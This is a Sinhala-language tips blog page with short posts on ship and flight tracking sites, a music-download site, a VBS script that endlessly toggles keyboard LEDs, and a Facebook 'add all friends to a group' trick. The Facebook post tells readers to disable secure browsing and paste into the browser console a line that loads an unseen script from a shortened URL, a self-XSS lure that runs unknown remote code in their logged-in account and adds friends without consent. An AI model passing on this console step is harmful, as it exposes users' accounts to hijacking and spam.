ඔන්න යාලුවනේ මේකනම් සුපිරිම වැඩක් නිකන් ඉන්න වෙලාවට සුපිරිම ආතල් වැඩේ :D මෙයින් අපට ප්‍රයෝජන රැසක් තියනවා ඕනෑම නැවක් තිබෙන ස්ථානය එවෙලේම නිවැරදිවම බලා ගන්න පුළුවන් . එම නැවේ සියලුම විස්තර බලාගන්න පුළුවන් . මේක 100% ක් නොමිලේ ගන්න පුළුවන් සේවාවක් . Download කරල crack කරන්න දෙයක් නැ :D ඔන්ලයින් ම බලන්න පුළුවන් :D එහෙනම් වැඩි කතා නැතුව වැඩේට බහිමු .

මුහුදේ නැව් නැරබීම සදහා : http://www.marinetraffic.com/ais/ මෙම අඩවියට පිවිසෙන්න . එපමණයි එහෙනම් අපි ගියා . comment එකක් දාල යන්න අමතක කරන්න එපා :)
අලුත් ලිපි ලබාගැනීම සදහා මෙහි email ලිපිනය සටහන් කර යන්න http://feedburner.google.com/fb/a/mailverify?uri=Thaweesha
ඉතුරු ටික කියවන්න

ඔන්න යාලුවනේ මේකනම් සුපිරිම වැඩක් නිකන් ඉන්න වෙලාවට සුපිරිම ආතල් වැඩේ :D මෙයින් අපට ප්‍රයෝජන රැසක් තියනවා ඕනෑම ගුවන් යානයක් තිබෙන ස්ථානය එවෙලේම නිවැරදිවම බලා ගන්න පුළුවන් . එම ගුවන් යානයේ සියලුම විස්තර බලාගන්න පුළුවන් . මේක 100% ක් නොමිලේ ගන්න පුළුවන් සේවාවක් . Download කරල crack කරන්න දෙයක් නැ :D ඔන්ලයින් ම බලන්න පුළුවන් :D එහෙනම් වැඩි කතා නැතුව වැඩේට බහිමු . 

ගුවන් යානා නැරබීම සදහා : http://www.flightradar24.com/ මෙම අඩවියට පිවිසෙන්න . එපමණයි එහෙනම් අපි ගියා . comment එකක් දාල යන්න අමතක කරන්න එපා :) 
අලුත් ලිපි ලබාගැනීම සදහා මෙහි email ලිපිනය සටහන් කර යන්න http://feedburner.google.com/fb/a/mailverify?uri=Thaweesha

ඉතුරු ටික කියවන්න
යාලුවනේ මේකනම් ගොඩක් අය දන්නව එත් අව්ලක් නැ :) දන්නෙ නැති අයත් ඇති නෙ එයාලට දැනගන්නත් එක්ක ඔන්න මම පොස්ට් එකක් දැම්ම .

මෙය භාවිතා කල හැක්කේ Fireෆොක්ස් සදහා පමණයි. නවතම සංස්කරණය වියයුතුය  .

මුලින්ම Facebook Account Settings >> Security Settings >> Secure Browsing වලට ගිහින් එකේ හරිය අයින් කරන්න .

මුලින්ම ඔයා යාළුවො එකතු කරන්න ඕන Group එකට යන්න .

දැන් CTRL + SHIFT + K තුන එක වර ඔබන්න .

දැන් පහත ඇති code එක copy කර එහි paste කර Enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/HC2rx';

දැන් යහළුවන් සියලුම දෙනා Group එකට එකතු වෙනු ඇත . ටික වෙලාවක් සිටින්න :)


ඉතුරු ටික කියවන්න
සිංහල ඉංග්‍රීසි හින්දි ඕනෑම සින්දුවක් හොයාගන්න පුළුවන් ලේසිම ක්‍රමයක් තමයි මෙය . මේක දන්නා අයත් ගොඩක් ඇති :) එහෙනම් අපි බලමු කොහම ද සින්දු හොයාගන්නෙ කියල.

මුලින්ම මෙම අඩවියට පිවිසෙන්න :-  http://mp3skull.com/



ඉහත රුපයේ පරිදි Search සදහා ඔබ කැමති සින්දුවේ නම ලබා දෙන්න .

දැන් ඉහත රුපයේ පරිදි අවශ්‍ය සින්දුව මත ඇති download කික් කරන්න. :)
ඉතුරු ටික කියවන්න

ඔන්න යාලුවනේ මේක නම් සුපිර්ම වැඩක් :) මෙය ක්‍රියාත්මක වන්නේ VBS ස්ක්‍රිපිට් එකක් මගින් .
දැන් අපි මෙය ක්‍රියාත්මක කර බලමු :) මුලින්ම Notepad වැඩසටහන open කරගන්න . පහත දැක්වෙන code එක copy කර එයට Paste කරන්න .


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

දැන් File > save as වෙත යන්න එහි save as type වෙනුවට All files යන්න තෝරන්න . file name වෙනුවට led.vbs යනුවෙන් ලබා දෙන්න . එය ඔබ කැමති තැනක save කරන්න . දැන් Notepad වැඩසටහන ඉවත් කර ඔබ save කරන ලද led.vbs ගොනුව open කරන්න . දැන් ඔබගේ කීබෝර්ඩ් එක දෙස බලන්න කොහමද වැඩේ මරු නෙ :D

දැන් අපි බලමු මෙය නතර කරන්නේ කෙසේද කියා ටාස්ක් බාර් එක මත right කික් කර task manager වෙත යන්න . පහත දැක්වෙන රුපයේ පරිදි windows based script host එක End task කරන්න .


එහෙනම් අපි ගියා සුබ අලුත් අවුරුද්දක් වේවා :)
ඉතුරු ටික කියවන්න


මෙමෙ බ්ලොග් අඩවියෙහි උපුටා ගත් කිසිවක් නොමැත. මෙහි ඇති කිසිවක් අනවසරයෙන් උපුටා ගැනීම තහනම්.